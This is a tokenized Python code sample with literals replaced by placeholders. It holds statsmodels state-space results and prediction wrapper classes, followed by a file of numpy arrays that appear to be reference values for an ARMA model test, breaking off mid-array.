insert ( <NUM_LIT:0> , "<STR_LIT>" ) <EOL> summary . add_extra_txt ( etext ) <EOL> return summary <EOL> class MLEResultsWrapper ( wrap . ResultsWrapper ) : <EOL> _attrs = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> _wrap_attrs = wrap . union_dicts ( tsbase . TimeSeriesResultsWrapper . _wrap_attrs , <EOL> _attrs ) <EOL> _methods = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> _wrap_methods = wrap . union_dicts ( <EOL> tsbase . TimeSeriesResultsWrapper . _wrap_methods , _methods ) <EOL> wrap . populate_wrapper ( MLEResultsWrapper , MLEResults ) <EOL> class PredictionResults ( pred . PredictionResults ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , model , prediction_results , row_labels = None ) : <EOL> if model . model . k_endog == <NUM_LIT:1> : <EOL> endog = pd . Series ( prediction_results . endog [ : , <NUM_LIT:0> ] , <EOL> name = model . model . endog_names ) <EOL> else : <EOL> endog = pd . DataFrame ( prediction_results . endog . T , <EOL> columns = model . model . endog_names ) <EOL> self . model = Bunch ( data = model . data . __class__ ( <EOL> endog = endog , <EOL> predict_dates = getattr ( model . data , '<STR_LIT>' , None ) ) , <EOL> ) <EOL> self . prediction_results = prediction_results <EOL> predicted_mean = self . prediction_results . forecasts <EOL> if predicted_mean . shape [ <NUM_LIT:0> ] == <NUM_LIT:1> : <EOL> predicted_mean = predicted_mean [ <NUM_LIT:0> , : ] <EOL> else : <EOL> predicted_mean = predicted_mean . transpose ( ) <EOL> var_pred_mean = self . prediction_results . forecasts_error_cov <EOL> if var_pred_mean . 
shape [ <NUM_LIT:0> ] == <NUM_LIT:1> : <EOL> var_pred_mean = var_pred_mean [ <NUM_LIT:0> , <NUM_LIT:0> , : ] <EOL> else : <EOL> var_pred_mean = var_pred_mean . transpose ( ) <EOL> super ( PredictionResults , self ) . __init__ ( predicted_mean , var_pred_mean , <EOL> dist = '<STR_LIT>' , <EOL> row_labels = row_labels , <EOL> link = identity ( ) ) <EOL> @ property <EOL> def se_mean ( self ) : <EOL> if self . var_pred_mean . ndim == <NUM_LIT:1> : <EOL> se_mean = np . sqrt ( self . var_pred_mean ) <EOL> else : <EOL> se_mean = np . sqrt ( self . var_pred_mean . T . diagonal ( ) ) <EOL> return se_mean <EOL> def conf_int ( self , method = '<STR_LIT>' , alpha = <NUM_LIT> , ** kwds ) : <EOL> conf_int = super ( PredictionResults , self ) . conf_int ( <EOL> method , alpha , ** kwds ) <EOL> if self . model . data . predict_dates is not None : <EOL> conf_int = pd . DataFrame ( conf_int , <EOL> index = self . model . data . predict_dates ) <EOL> else : <EOL> conf_int = pd . DataFrame ( conf_int ) <EOL> ynames = self . model . data . ynames <EOL> if not type ( ynames ) == list : <EOL> ynames = [ ynames ] <EOL> names = ( [ '<STR_LIT>' % name for name in ynames ] + <EOL> [ '<STR_LIT>' % name for name in ynames ] ) <EOL> conf_int . columns = names <EOL> return conf_int <EOL> def summary_frame ( self , endog = <NUM_LIT:0> , what = '<STR_LIT:all>' , alpha = <NUM_LIT> ) : <EOL> from statsmodels . compat . collections import OrderedDict <EOL> ci_mean = self . conf_int ( alpha = alpha ) . values <EOL> to_include = OrderedDict ( ) <EOL> if self . predicted_mean . ndim == <NUM_LIT:1> : <EOL> yname = self . model . data . ynames <EOL> to_include [ '<STR_LIT>' ] = self . predicted_mean <EOL> to_include [ '<STR_LIT>' ] = self . se_mean <EOL> k_endog = <NUM_LIT:1> <EOL> else : <EOL> yname = self . model . data . ynames [ endog ] <EOL> to_include [ '<STR_LIT>' ] = self . predicted_mean [ : , endog ] <EOL> to_include [ '<STR_LIT>' ] = self . se_mean [ : , endog ] <EOL> k_endog = self . 
predicted_mean . shape [ <NUM_LIT:1> ] <EOL> to_include [ '<STR_LIT>' ] = ci_mean [ : , endog ] <EOL> to_include [ '<STR_LIT>' ] = ci_mean [ : , k_endog + endog ] <EOL> self . table = to_include <EOL> res = pd . DataFrame ( to_include , index = self . row_labels , <EOL> columns = to_include . keys ( ) ) <EOL> res . columns . name = yname <EOL> return res <EOL> class PredictionResultsWrapper ( wrap . ResultsWrapper ) : <EOL> _attrs = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> _wrap_attrs = wrap . union_dicts ( _attrs ) <EOL> _methods = { } <EOL> _wrap_methods = wrap . union_dicts ( _methods ) <EOL> wrap . populate_wrapper ( PredictionResultsWrapper , PredictionResults ) </s>
<s> import numpy as np <EOL> llf = np . array ( [ - <NUM_LIT> ] ) <EOL> nobs = np . array ( [ <NUM_LIT> ] ) <EOL> k = np . array ( [ <NUM_LIT:4> ] ) <EOL> k_exog = np . array ( [ <NUM_LIT:1> ] ) <EOL> sigma = np . array ( [ <NUM_LIT> ] ) <EOL> chi2 = np . array ( [ <NUM_LIT> ] ) <EOL> df_model = np . array ( [ <NUM_LIT:3> ] ) <EOL> k_ar = np . array ( [ <NUM_LIT:1> ] ) <EOL> k_ma = np . array ( [ <NUM_LIT:2> ] ) <EOL> params = np . array ( [ <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> ] ) <EOL> cov_params = np . array ( [ <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> ] ) . reshape ( <NUM_LIT:4> , <NUM_LIT:4> ) <EOL> xb = np . array ( [ <NUM_LIT:0> , <EOL> <NUM_LIT:0> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> 
<NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> 
<NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> ] ) <EOL> y = np . array ( [ np . nan , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , 
<EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , 
<EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> ] ) <EOL> resid = np . array ( [ np . nan , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - 
<NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> 
<NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> ] ) <EOL> yr = np . array ( [ np . nan , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , 
<EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> 